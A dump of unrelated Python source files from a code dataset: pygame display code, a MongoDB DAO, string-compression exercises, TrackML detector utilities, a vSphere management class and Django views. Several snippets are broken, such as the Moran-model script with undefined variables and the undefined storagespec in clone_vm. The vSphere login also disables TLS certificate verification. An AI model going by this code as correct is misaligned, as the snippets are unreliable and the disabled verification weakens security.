self.screen_background_exp.fill(self.background)\n self.screen_background_pat.fill(self.pat_background_color)\n\n x1, y1 = self.workspace_top_right\n x0, y0 = self.workspace_bottom_left\n\n self.normalize = np.array(np.diag([1./(x1-x0), 1./(y1-y0), 1]))\n self.center_xform = np.array([[1., 0, -x0], \n [0, 1., -y0],\n [0, 0, 1]])\n self.norm_to_screen = np.array(np.diag(np.hstack([self.exp_size, 1])))\n\n # the y-coordinate in pixel space has to be swapped for some graphics convention reason\n self.flip_y_coord = np.array([[1, 0, 0],\n [0, -1, self.exp_size[1]],\n [0, 0, 1]])\n\n self.pos_space_to_pixel_space = np.dot(self.flip_y_coord, np.dot(self.norm_to_screen, np.dot(self.normalize, self.center_xform)))\n\n self.world = Group(self.models)\n # Dont 'init' self.world in this Window. 
Just allocates a bunch of OpenGL stuff which is not necessary (and may not work in some cases)\n # self.world.init()\n\n #initialize surfaces for translucent markers\n\n self.neutral_arm = pygame.image.load(os.path.expandvars('$ISMORE/invasive/display_pngs/neutral.png'))\n self.neutral_arm = self.neutral_arm.convert()\n \n TRANSPARENT = (255,0,255)\n\n #Gets value at (0,0) to make background of arm image transparent\n arm_TRANSPARENT = self.neutral_arm.get_at((0,0))\n\n #Surface ['0'] is the cursor surface\n #Surface [1] is the target surface\n #Surface [2] is the patient display surface\n #Surface [3] is the arm image surface\n\n self.surf={}\n self.surf['0'] = pygame.Surface(self.exp_size)\n self.surf['0'].fill(TRANSPARENT)\n self.surf['0'].set_colorkey(TRANSPARENT)\n\n self.surf['1'] = pygame.Surface(self.exp_size)\n self.surf['1'].fill(TRANSPARENT)\n self.surf['1'].set_colorkey(TRANSPARENT) \n\n self.surf['2'] = pygame.Surface(self.pat_window_size)\n self.surf['2'].fill(TRANSPARENT)\n self.surf['2'].set_colorkey(TRANSPARENT)\n\n self.surf['3'] = pygame.Surface(self.pat_window_size)\n self.surf['3'].fill(arm_TRANSPARENT)\n self.surf['3'].set_colorkey(arm_TRANSPARENT) \n\n #values of alpha: higher = less translucent\n self.surf['0'].set_alpha(170) #Cursor\n self.surf['1'].set_alpha(130) #Targets\n self.surf['2'].set_alpha(130)\n self.surf['3'].set_alpha(200)\n \n self.exp_surf_background = pygame.Surface(self.exp_window_size).convert()\n self.exp_surf_background.fill(TRANSPARENT)\n\n self.pat_surf_background = pygame.Surface(self.pat_window_size).convert()\n self.pat_surf_background.fill(TRANSPARENT)\n\n self.arm_surf_background = pygame.Surface(self.pat_window_size).convert()\n self.arm_surf_background.fill(arm_TRANSPARENT)\n\n self.i = 0\n\n\n def draw_world(self):\n #Refreshes the screen with original background\n self.screen.blit(self.screen_background_exp, self.exp_wind_coord)\n self.screen.blit(self.screen_background_pat, self.pat_wind_coord)\n\n self.surf['0'].blit(self.exp_surf_background,(0, 0))\n self.surf['1'].blit(self.exp_surf_background,(0, 0))\n self.surf['2'].blit(self.pat_surf_background,(0, 0))\n self.surf['3'].blit(self.arm_surf_background,(0, 0))\n \n # surface index\n self.i = 0\n\n for model in self.world.models:\n self.draw_model(model)\n self.i += 1\n\n self.update_pat_display()\n\n #Renders the new surfaces\n self.screen.blit(self.surf['0'], self.exp_wind_coord)\n self.screen.blit(self.surf['1'], self.exp_wind_coord)\n self.screen.blit(self.surf['2'], self.pat_wind_coord)\n self.screen.blit(self.surf['3'], self.pat_wind_coord)\n\n pygame.display.update()\n\n def update_pat_display(self):\n '''Example code: To be overwritten in child classes'''\n if self.state == 'target':\n text = self.font.render(\"Target Number:\"+str(self.trial_ix_print), 1, (1, 1, 1))\n self.surf['2'].blit(text, self.txt_pos)\n self.surf['3'].blit(self.neutral_arm, (0,0))\n\n","sub_path":"ismore/invasive/patient_display.py","file_name":"patient_display.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585140324","text":"import codecs\nimport datetime\nimport os\n\nfrom django.db import models\nfrom pymongo import *\n\n# Create your models here.\n \nclass FileDAO():\n \n def __init__(self, file_id, revision, owner_id):\n client = MongoClient('localhost', 27017)\n db = client.file\n self.fileCol = db.file\n \n self.file_id = int(file_id)\n self.owner_id = int(owner_id)\n self.revision = int(revision)\n if self.revision < 1 :\n self.revision = self.get_max_revision() \n \n self.query = {\"file_id\": self.file_id, \"revision\": self.revision, \"owner_id\": self.owner_id, \"is_active\" : True}\n return\n\n def is_exist(self):\n print(self.query)\n cnt = self.fileCol.find(self.query).count()\n if cnt == 0 :\n return False\n else :\n return True\n\n def read(self):\n return self.fileCol.find_one(self.query)\n\n def read_body(self):\n return self.fileCol.find_one(self.query,\n {\"file_id\" : 1, \"revision\" : 1, \"owner_id\" : 1, \"title\" : 1, \"author\" : 1, \"description\" : 1, \"abstract\" :1 , \"body\" :1})\n\n def read_image(self):\n return self.fileCol.find_one(self.query, {\"image\" :1, \"symbol\" : 1})\n\n def read_all(self):\n return self.fileCol.find_one(self.query)\n\n def update(self, doc, rev_update):\n author = doc[\"author\"].split(\",\")\n doc[\"author\"] = {\n \"author1\" : author[0],\n \"author2\" : author[1],\n \"author3\" : author[2]\n }\n univ = doc[\"univ\"].split(\",\")\n doc[\"univ\"] = {\n \"univ1\" : univ[0],\n \"univ2\" : univ[1],\n \"univ3\" : univ[2]\n }\n if int(rev_update) == 1 :\n doc.update(self.query)\n doc[\"revision\"] = self.get_max_revision() + 1\n return self.fileCol.insert(doc)\n else :\n return self.fileCol.update(self.query, {\"$set\" : doc})\n\n def insert(self, title, description):\n max_id = len(self.fileCol.distinct(\"file_id\"))\n\n doc = {}\n doc[\"file_id\"] = max_id + 1\n doc[\"revision\"] = 1\n doc[\"owner_id\"] = self.owner_id\n doc[\"is_active\"] = True\n doc[\"title\"] = title\n doc[\"description\"] = description\n doc[\"author\"] = \"\"\n doc[\"univ\"] = \"\"\n doc[\"abstract\"] = \"\"\n doc[\"body\"] = \"\"\n doc[\"image\"] = \"\"\n doc[\"symbol\"] = \"\"\n return self.fileCol.insert(doc)\n\n def delete(self):\n doc = {}\n doc[\"is_active\"] = False\n return self.fileCol.update(self.query, {\"$set\" : doc})\n\n def get_file_list(self):\n return self.fileCol.find({\"owner_id\": self.owner_id, \"is_active\": True},\n {\"file_id\" : 1, \"revision\" : 1 , \"title\" : 1, \"description\" : 1}).sort(\"file_id\", 1)\n\n def get_revision_list(self):\n return self.fileCol.find({\"file_id\" : self.file_id, \"is_active\" : True},\n {\"file_id\" : 1, \"revision\" : 1 , \"title\" : 1, \"description\" : 1}).sort(\"revision\", -1)\n\n def get_max_revision(self):\n docs = self.get_revision_list()\n max_revision = 0\n for tmp in docs :\n max_revision = tmp[\"revision\"]\n break\n return max_revision\n\nclass DataFile():\n\n def __init__(self, dataID):\n\n self.fileDir = \"data\"\n self.filename = self.fileDir + \"/\" + dataID\n return\n \n def saveFile(self, text):\n try:\n file = codecs.open(self.filename, \"w\", \"UTF-8\")\n file.write(text)\n file.closed\n return True\n except IOError:\n file.closed\n return False\n\n def readFile(self):\n text = \"\"\n try:\n file = codecs.open(self.filename, \"r\", \"UTF-8\")\n text = file.read()\n file.closed\n except IOError:\n text = \"\"\n return text\n\n def deleteFile(self):\n try:\n os.remove(self.filename)\n return True\n except IOError:\n return 
False\n","sub_path":"mysite/filemgr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"425132674","text":"\n\n#calss header\nclass _BOOT():\n\tdef __init__(self,): \n\t\tself.name = \"BOOT\"\n\t\tself.definitions = [u'to kick someone or something hard with the foot: ', u'When a computer boots (up), it becomes ready for use by getting the necessary information into its memory, and when you boot (up) a computer, you cause it to do this.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_boot.py","file_name":"_boot.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636785787","text":"# This is question from Cracking the coding interview. Chapter 1.6\n\ndef stringcompression(str1):\n\n prev_chr=''\n tmp=''\n cnt=0\n for i in range(0,len(str1)):\n if prev_chr!=str1[i]:\n if prev_chr!='':\n tmp=tmp+prev_chr+str(cnt)\n prev_chr=str1[i]\n else:\n prev_chr = str1[i]\n cnt=1\n else:\n cnt=cnt+1\n tmp=tmp+str1[i]+str(cnt)\n return tmp\n\ndef stringexpansion(str1):\n\n prev_chr=''\n tmp=''\n for i in range(0,len(str1)):\n if (ord(str1[i])>=65 and ord(str1[i])<=90) or (ord(str1[i])>=97 and ord(str1[i])<=122):\n prev_chr=str1[i]\n\n else:\n j = 0\n while (j < int(str1[i])):\n tmp = tmp + prev_chr\n j = j + 1\n\n return tmp\ndef main():\n str1 = 'aabcccccaa'\n\n print('Compressed String:',stringcompression(str1))\n print('Expaned String:',stringexpansion(stringcompression(str1)))\n\nif __name__=='__main__':\n main()\n","sub_path":"python/Strings/StringCompression.py","file_name":"StringCompression.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"428889588","text":"import urllib.request\nimport json\n\nurl = \"http://m.ovies.at/app/fetch.php\"\nresponse = urllib.request.urlopen(url)\ndata = json.loads(response.read())\nmyList = []\nmyIDList = []\nmyNameList = []\nfor ysa in data['result']:\n print(ysa['mvimg'])\n myList.append(str(ysa['mvimg']))\n myIDList.append(ysa['mvid'])\n myNameList.append(str(ysa['mvname']))\nprint(myList)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230174245","text":"import Tkinter, random\nfrom game import *\n\ndim = 10\nlevel = dim // 2\nsquareWidth = 10\ncanvasWidth = size * squareWidth\npayoff = [[1,0],[0,1]]\ncolors = [\"#f91b23\", \"#00a33d\", \"#3131cd\"] #rgb\ng = Game(payoff, dim)\n\ntheWindow = Tkinter.Tk()\ntheWindow.title(\"Moran Model\")\ntheWindow.geometry('+50+50') \n\ntheCanvas = Tkinter.Canvas(theWindow, width = canvasWidth, height = canvasWidth)\ntheCanvas.pack()\ntheImage = Tkinter.PhotoImage(width = canvasWidth, height = canvasWidth)\ntheCanvas.create_image((3,3), image = theImage, anchor = \"nw\", state = \"normal\")\n\ndef startStop():\n global running\n running = not running\n if running:\n goButton.config(text=\"Pause\")\n else:\n goButton.config(text=\"Resume\")\n\ndef colorSquare(i, j):\n theColor = colors[g.board.access([i,j,level])]\n theImage.put(t)\n\n\ndef simulate():\n if running:\n for step in range(1000):\n g.update()\n eDiff = deltaE(i,j)\n if eDiff <= 0 or random.random() < math.exp(-eDiff/T): # Metropolis!\n s[i,j] = -s[i,j]\n colorSquare(i, j)\n theWindow.after(1,simulate) \n","sub_path":"Code/simulation/README.py","file_name":"README.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286399578","text":"import os\r\nimport time\r\nimport pickle\r\nimport logging\r\nimport argparse\r\nimport numpy as np\r\nimport pandas as pd\r\nimport functools\r\n\r\nimport trackml.dataset\r\n\r\n\r\n#############################################\r\n# DETECTOR UTILS #\r\n#############################################\r\ndef load_detector(detector_path):\r\n detector_orig = pd.read_csv(detector_path)\r\n detector_pfx = detector_path.split(\".\")[0]\r\n detector_preproc = detector_pfx + \".pickle\"\r\n try:\r\n print(\"Loading detector...\")\r\n with open(detector_preproc, \"rb\") as f:\r\n detector = pickle.load(f)\r\n print(\"Detector loaded.\")\r\n except:\r\n print(\"Failed to load preprocessed detector. Building...\")\r\n detector = pd.read_csv(detector_path)\r\n detector = preprocess_detector(detector)\r\n with open(detector_preproc, \"xb\") as f:\r\n pickle.dump(detector, f)\r\n print(\"Detector preprocessed and saved.\")\r\n return detector_orig, detector\r\n\r\n\r\ndef preprocess_detector(detector):\r\n thicknesses = Detector_Thicknesses(detector).get_thicknesses()\r\n rotations = Detector_Rotations(detector).get_rotations()\r\n pixel_size = Detector_Pixel_Size(detector).get_pixel_size()\r\n det = dict(thicknesses=thicknesses, rotations=rotations, pixel_size=pixel_size)\r\n return det\r\n\r\n\r\ndef determine_array_size(detector):\r\n max_v, max_l, max_m = (0, 0, 0)\r\n unique_vols = detector.volume_id.unique()\r\n max_v = max(unique_vols) + 1\r\n for v in unique_vols:\r\n vol = detector.loc[detector[\"volume_id\"] == v]\r\n unique_layers = vol.layer_id.unique()\r\n max_l = max(max_l, max(unique_layers) + 1)\r\n for l in unique_layers:\r\n lay = vol.loc[vol[\"layer_id\"] == l]\r\n unique_modules = lay.module_id.unique()\r\n max_m = max(max_m, max(unique_modules) + 1)\r\n return max_v, max_l, max_m\r\n\r\n\r\nclass Detector_Rotations(object):\r\n def __init__(self, detector):\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_rotations(self):\r\n print(\" Extracting rotations...\")\r\n self._init_rotation_array()\r\n self._extract_all_rotations()\r\n print(\" Done.\")\r\n return self.rot\r\n\r\n def _init_rotation_array(self):\r\n self.rot = np.zeros((self.max_v, self.max_l, self.max_m, 3, 3))\r\n\r\n def _extract_all_rotations(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n rot = self._extract_rotation_matrix(r)\r\n self.rot[v, l, m] = rot\r\n\r\n def _extract_rotation_matrix(self, mod):\r\n \"\"\"\r\n Extract the rotation matrix from module dataframe\r\n \"\"\"\r\n r = np.matrix(\r\n [\r\n [mod.rot_xu.item(), mod.rot_xv.item(), mod.rot_xw.item()],\r\n [mod.rot_yu.item(), mod.rot_yv.item(), mod.rot_yw.item()],\r\n [mod.rot_zu.item(), mod.rot_zv.item(), mod.rot_zw.item()],\r\n ]\r\n )\r\n return r\r\n\r\n\r\nclass Detector_Thicknesses(object):\r\n def __init__(self, detector):\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_thicknesses(self):\r\n print(\" Extracting thicknesses...\")\r\n self._init_thickness_array()\r\n self._extract_all_thicknesses()\r\n print(\" Done.\")\r\n return self.all_t\r\n\r\n def _init_thickness_array(self):\r\n self.all_t = np.zeros((self.max_v, self.max_l, self.max_m))\r\n\r\n def _extract_all_thicknesses(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n 
self.all_t[v, l, m] = r.module_t\r\n\r\n\r\nclass Detector_Pixel_Size(object):\r\n def __init__(self, detector):\r\n print(detector.keys())\r\n self.detector = detector\r\n self.max_v, self.max_l, self.max_m = determine_array_size(detector)\r\n\r\n def get_pixel_size(self):\r\n print(\" Extracting thicknesses...\")\r\n self._init_size_array()\r\n self._extract_all_size()\r\n print(\" Done.\")\r\n return self.all_s\r\n\r\n def _init_size_array(self):\r\n self.all_s = np.zeros((self.max_v, self.max_l, self.max_m, 2))\r\n\r\n def _extract_all_size(self):\r\n for i, r in self.detector.iterrows():\r\n v, l, m = tuple(map(int, (r.volume_id, r.layer_id, r.module_id)))\r\n self.all_s[v, l, m, 0] = r.pitch_u\r\n self.all_s[v, l, m, 1] = r.pitch_v\r\n","sub_path":"Pipelines/TrackML_Example/LightningModules/Processing/utils/detector_utils.py","file_name":"detector_utils.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"630165085","text":"\"\"\"\nFile name: Stateless.py\nPurpose: Hold vSphere common variables like Admin credentials, Datacenter, Datastore, Cluster and Resources pool.\n\"\"\"\n\nfrom pyVmomi import vim\nfrom pyVim.connect import SmartConnect, SmartConnectNoSSL, Disconnect\nimport atexit\nimport argparse\nimport getpass\nimport ssl\nimport re\n\n\n\nclass StatelessObj():\n\n def __init__(self, vcenter_ip, vcenter_user, vcenter_password):\n \"\"\"\n :param vcenter_ip: ip address ,Type: string\n :param vcenter_user: username ,Type: string\n :param vcenter_password: password ,Type: string\n \"\"\"\n self.vcenter_ip = vcenter_ip\n self.vcenter_user = vcenter_user\n self.vcenter_password = vcenter_password\n\n # Changeable\n self.datacenter = None\n self.datastore = None\n self.cluster = None\n self.RP = None\n\n def set_datacenter(self, datacenter):\n \"\"\"\n Set datacenter\n :param datacenter:\n :return: None\n \"\"\"\n self.datacenter = datacenter\n\n def get_datacenter(self):\n \"\"\"\n Get the object's datacenter\n :return: object's datacenter\n \"\"\"\n return self.datacenter\n\n def datacenter_is_empty(self):\n \"\"\"\n Check if datacenter has a value\n :return:\n \"\"\"\n if self.datacenter == None:\n return True\n return False\n\n def datacenter_to_string(self):\n \"\"\"\n Convert datacenter value to a string and return it\n :return: string of datacenter\n \"\"\"\n return str(self.datacenter)\n\n def set_datastore(self, datastore):\n \"\"\"\n Set datastore\n :param datastore:\n :return: None\n \"\"\"\n self.datastore = datastore\n\n def get_datastore(self):\n \"\"\"\n Get the object's datastore\n :return: object's datastore\n \"\"\"\n return self.datastore\n\n def datastore_is_empty(self):\n \"\"\"\n Check if datastore has a value\n :return:\n \"\"\"\n if self.datastore == None:\n return True\n return False\n\n def datastore_to_string(self):\n \"\"\"\n Convert datastore value to a string and return it\n :return: string of datastore\n \"\"\"\n return str(self.datastore)\n\n def set_cluster(self, cluster):\n \"\"\"\n Set cluster\n :param cluster:\n :return: None\n \"\"\"\n self.cluster = cluster\n\n def get_cluster(self):\n \"\"\"\n Get the object's cluster\n :return: object's cluster\n \"\"\"\n return self.cluster\n\n def cluster_is_empty(self):\n \"\"\"\n Check if cluster has a value\n :return:\n \"\"\"\n if self.cluster == None:\n return True\n return False\n\n def cluster_to_string(self):\n \"\"\"\n Convert cluster value to a string and return it\n :return: string of cluster\n \"\"\"\n return str(self.cluster)\n\n def set_RP(self, RP):\n \"\"\"\n Set RP\n :param RP:\n :return: None\n \"\"\"\n self.RP = RP\n\n def get_RP(self):\n \"\"\"\n Get the object's RP\n :return: object's RP\n \"\"\"\n return self.RP\n\n def RP_is_empty(self):\n \"\"\"\n Check if RP has a value\n :return:\n \"\"\"\n if self.RP == None:\n return True\n return False\n\n def RP_to_string(self):\n \"\"\"\n Convert RP value to a string and return it\n :return: string of RP\n \"\"\"\n return str(self.RP)\n\n \n def login(self):\n \"\"\"\n login function take vcenter ip, user, password and sign in to retrive a service instance.\n :param vcenter_ip: vcenter ip address\n :param vcenter_user: vcenter username \n :param vcenter_password: vcenter password\n :return: service instance content object\n \"\"\"\n #Connectin to vCenter\n context = ssl._create_unverified_context()\n serviceInstance = SmartConnect(host=self.vcenter_ip,\n user=self.vcenter_user,\n pwd=self.vcenter_password,\n port=int(443), 
sslContext=context)\n if not serviceInstance:\n print(\"Could not connect to the specified host using specified \"\n \"username and password\")\n return -1\n atexit.register(Disconnect, serviceInstance)\n return serviceInstance\n\n\n def logout(self, si):\n \"\"\"\n logout function to logout \n :param si: service instance\n :return: N/A\n \"\"\"\n si.content.sessionManager.Logout()\n\n\n def retrive_content(self, si):\n \"\"\"\n retrive content from a service instance\n :param si: service instance\n :return: service instance content \n \"\"\"\n content = si.RetrieveContent()\n return content\n\n\n def get_obj(self,content, vimtype, name):\n \"\"\"\n take the content and type of vim and name and return the object\n :param content: service instance content\n :param vimtype: the type of vim\n :param the name of the object\n :return: The object in question \n \"\"\"\n obj = None\n container = content.viewManager.CreateContainerView(\n content.rootFolder, vimtype, True)\n for c in container.view:\n if c.name == name:\n obj = c\n break\n return obj\n\n\n def wait_for_task(self,task):\n \"\"\"\n wait for a vCenter task to finish \n :param task: task to be waited for\n :return N/A\n \"\"\"\n task_done = False\n while not task_done:\n if task.info.state == 'success':\n return task.info.result\n\n if task.info.state == 'error':\n print(\"there was an error\")\n task_done = True\n\n\n def mkdir_task(self, base_obj, dir_name):\n \"\"\"\n helper function takes the base object and dir name and creat the folder with dir name\n :param base_obj: base object\n :param dir_name: folder name\n :returns: the base object\n \"\"\"\n try:\n return base_obj.CreateFolder(dir_name)\n except (vim.fault.InvalidName) as e:\n print(e)\n import sys\n\n\n def create_folder(self, content, base_obj, folder_path):\n \"\"\"\n takes the content, base object and nested folder pathe and creats that folder dirctory\n :param content: service instance content\n :param base_obj: base object\n :param folder_path: nested path e.g. /folder1/folder2/folder3\n :return : N/A\n \"\"\"\n folder_path_parts = folder_path.strip('/').split('/')\n for path_part in folder_path_parts:\n if base_obj.childEntity:\n for y, child_obj in enumerate(base_obj.childEntity):\n if child_obj.name == path_part:\n base_obj = child_obj\n break\n elif y >= len(base_obj.childEntity)-1:\n base_obj = self.mkdir_task(base_obj, path_part)\n break\n else:\n base_obj = self.mkdir_task(base_obj, path_part)\n\n\n def test_create_folder(self,content, folder_path):\n \"\"\"\n test the functionality of create_folder and check whether the folder exist or not\n :param content: service instance content\n :param folder_path: nested path e.g. 
/folder1/folder2/folder3\n \"\"\"\n try:\n dc = self.get_obj(content, [vim.Datacenter], self.datacenter)\n if (self.get_obj(content, [vim.Folder], folder_path)):\n print(\"Folder '%s' already exists\" % folder_path)\n return 1\n else:\n #self.create_folder(content, dc.hostFolder, folder_path)\n #print(\"Successfully created the host folder '%s'\" % folder_path)\n self.create_folder(content, dc.vmFolder, folder_path)\n print(\"Successfully created the VM folder '%s'\" % folder_path)\n return 1\n except:\n return 0\n\n\n\n def GetVMHosts(self,content):\n \"\"\"\n get VM hosts view\n :param content: service instance content\n :return object of VM hosts\n \"\"\"\n host_view = content.viewManager.CreateContainerView(content.rootFolder,[vim.HostSystem],True)\n obj = [host for host in host_view.view]\n host_view.Destroy()\n return obj\n\n\n def Create_vSwitch(self, vcenter, vswitch_Name):\n \"\"\"\n create a virtual switch to the vcenter\n :param hosts: hosts to create virtual switch to\n :param vswitch_Name: the vswitch name \n :return : N/A\n \"\"\"\n for host in vcenter:\n try:\n vswitch_spec = vim.host.VirtualSwitch.Specification()\n vswitch_spec.numPorts = 1024\n vswitch_spec.mtu = 1450\n host.configManager.networkSystem.AddVirtualSwitch(vswitch_Name,vswitch_spec)\n except vim.fault.AlreadyExists:\n print(\"vSwitch {} alredy exist\".format(vswitch_Name))\n\n\n def Create_PortGroup(self,vcenter, vswitch_Name, PG_Name, vlanId):\n \"\"\"\n create a port group to the vcenter and add it to a virtual switch with a spesfic vlan ID\n :param hosts: hosts to create virtual switch to\n :param vswitch_Name: the vswitch name \n :param PG_Name: port group name\n :param vlanId: vlan id number\n :return : N/A\n \"\"\"\n for host in vcenter:\n try:\n portgroup_spec = vim.host.PortGroup.Specification()\n portgroup_spec.vswitchName = vswitch_Name\n portgroup_spec.name = PG_Name\n portgroup_spec.vlanId = int(vlanId)\n network_policy = vim.host.NetworkPolicy()\n network_policy.security = vim.host.NetworkPolicy.SecurityPolicy()\n network_policy.security.allowPromiscuous = True\n network_policy.security.macChanges = False\n network_policy.security.forgedTransmits = False\n portgroup_spec.policy = network_policy\n host.configManager.networkSystem.AddPortGroup(portgroup_spec)\n except vim.fault.AlreadyExists:\n print(\"Port group {} alredy exist in vSwitch {} \".format(PG_Name, vswitch_Name)) \n\n\n def add_nic(self,content, VM, PG_Name):\n \"\"\"\n create a network interface card for a specfic vm and attach it to a port group\n :param content: service instance content\n :param VM: the vm to add the nic to \n :param PG_Name: port group name\n :return : N/A\n \"\"\"\n spec = vim.VM.ConfigSpec()\n nic_changes = []\n\n nic_spec = vim.VM.device.VirtualDeviceSpec()\n nic_spec.operation = vim.VM.device.VirtualDeviceSpec.Operation.add\n\n nic_spec.device = vim.VM.device.VirtualE1000()\n\n nic_spec.device.deviceInfo = vim.Description()\n nic_spec.device.deviceInfo.summary = 'vCenter API test'\n\n network = self.get_obj(content, [vim.Network], PG_Name)\n if isinstance(network, vim.OpaqueNetwork):\n nic_spec.device.backing = vim.VM.device.VirtualEthernetCard.OpaqueNetworkBackingInfo()\n nic_spec.device.backing.opaqueNetworkType = network.summary.opaqueNetworkType\n nic_spec.device.backing.opaqueNetworkId = network.summary.opaqueNetworkId\n else:\n nic_spec.device.backing = vim.VM.device.VirtualEthernetCard.NetworkBackingInfo()\n nic_spec.device.backing.useAutoDetect = False\n nic_spec.device.backing.deviceName = 
network.name\n\n nic_spec.device.connectable = vim.VM.device.VirtualDevice.ConnectInfo()\n nic_spec.device.connectable.startConnected = True\n nic_spec.device.connectable.allowGuestControl = True\n nic_spec.device.connectable.connected = False\n nic_spec.device.connectable.status = 'untried'\n nic_spec.device.wakeOnLanEnabled = True\n nic_spec.device.addressType = 'assigned'\n\n nic_changes.append(nic_spec)\n spec.deviceChange = nic_changes\n #e = VM.ReconfigVM_Task(spec=spec)\n print(\"NIC CARD ADDED\")\n\n\n \n def clone_vm(self,content, VM_Name, Template_Name, Folder_Path, IP_Address, Gateway,NetMask, DNS_Server):\n \"\"\"\n clone a virtual machine from a template\n :param content: service instance content\n :param VM_Name: the virtual machine name\n :param Template_Name: template name to be cloned\n :param IP_Address: ip adress of the VM\n :param Gateway: the Gateway of the virtual machine\n :param NetMask: network mask\n :param DNS_Server: the DNS server\n :return N/A\n \"\"\"\n\n if self.datacenter == None:\n return -1\n if self.datastore == None:\n return -1\n if self.RP == None:\n return -1\n\n try:\n # if none git the first one\n datacenter = self.get_obj(content, [vim.Datacenter], self.datacenter)\n\n destfolder = self.get_obj(content, [vim.Folder], Folder_Path)\n # destfolder = datacenter.vmFolde\n datastore = self.get_obj(content, [vim.Datastore], self.datastore)\n\n # if None, get the first one\n cluster = self.get_obj(content, [vim.ClusterComputeResource], self.cluster)\n\n resource_pool = self.get_obj(content, [vim.ResourcePool], self.RP)\n\n TheTemplate = self.get_obj(content, [vim.VirtualMachine], Template_Name)\n\n # datastore = self.get_obj(content, [vim.Datastore], real_datastore_name)\n\n vmconf = vim.vm.ConfigSpec()\n\n # if datastorecluster_name:\n # podsel = vim.storageDrs.PodSelectionSpec()\n # pod = get_obj(content, [vim.StoragePod], datastorecluster_name)\n # podsel.storagePod = pod\n\n # storagespec = vim.storageDrs.StoragePlacementSpec()\n # storagespec.podSelectionSpec = podsel\n # storagespec.type = 'create'\n # storagespec.folder = destfolder\n # storagespec.resourcePool = resource_pool\n # storagespec.configSpec = vmconf\n\n try:\n rec = content.storageResourceManager.RecommendDatastores(\n storageSpec=storagespec)\n rec_action = rec.recommendations[0].action[0]\n real_datastore_name = rec_action.destination.name\n except:\n real_datastore_name = TheTemplate.datastore[0].info.name\n\n # set relospec\n relospec = vim.vm.RelocateSpec()\n relospec.datastore = datastore\n relospec.pool = resource_pool\n\n clonespec = vim.vm.CloneSpec()\n clonespec.location = relospec\n clonespec.powerOn = True\n\n print(\"cloning VM...\")\n task = TheTemplate.Clone(folder=destfolder, name=VM_Name, spec=clonespec)\n\n\n #self.wait_for_task(task)\n\n return 1\n except Exception as e:\n print(\"Stateless Debug Message :\" + str(e), file=sys.stderr)\n return 0\n\n\n def motd(self, content, message):\n \"\"\"\n message of the day on vcenter\n :param message: message to be sent \n :param content: service instance content\n \"\"\"\n content.content.sessionManager.UpdateServiceMessage(message=message)\n\n","sub_path":"flask/lib/Stateless.py","file_name":"Stateless.py","file_ext":"py","file_size_in_byte":15602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
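`StatelessObj` bundles the vCenter connection state with a grab-bag of inventory and network helpers. A hypothetical usage sketch follows; the address, credentials, and inventory names are placeholders, and the import path is assumed from the file's location (`flask/lib/Stateless.py`). Note that `retrive_content` is the method's actual (misspelled) name in the class.

```python
# Hypothetical usage sketch of StatelessObj; the vCenter address,
# credentials, and inventory names below are placeholders, not real values.
from lib.Stateless import StatelessObj  # import path assumed from flask/lib/

vc = StatelessObj("192.0.2.10", "administrator@vsphere.local", "secret")
vc.set_datacenter("DC1")
vc.set_datastore("datastore1")
vc.set_cluster("Cluster1")
vc.set_RP("Resources")

si = vc.login()
if si != -1:
    content = vc.retrive_content(si)  # note: spelled without the second 'e'
    hosts = vc.GetVMHosts(content)
    vc.Create_vSwitch(hosts, "vSwitch-lab")
    vc.Create_PortGroup(hosts, "vSwitch-lab", "PG-vlan100", 100)
    vc.logout(si)
```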
+{"seq_id":"633767388","text":"from django.shortcuts import render\nfrom dc_app.serializers import MajorSerializer,CredentialSerializer,UserprofileSerializer,NewsSerializer\n# Create your views here.\nfrom django.http import Http404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework import permissions\nfrom django.http import HttpResponse\nfrom dc_app.models import Credential,Major,News\nfrom rest_framework import permissions\n#from dc_app.permissions import IsSuperOrReadOnly\nimport random\nfrom dc_app.models import EmailVerityRecord\nimport json\nfrom django.core.mail import send_mail\nfrom DC.settings import EMAIL_FROM\nerror = {'status':'error'}\nok = {'status':'ok'}\n\n\nclass MajorList(APIView):\n\tdef get(self,request):\n\t\tmajor = Major.objects.all()\n\t\tserializer = MajorSerializer(major,many=True)\n\t\treturn Response(serializer.data)\n\tdef post(self,request):\n\t\t#self.check_object_permissions(request, obj)\n\t\tserializer = MajorSerializer(data=request.data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data,status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass MajorDetail(APIView):\n\tdef 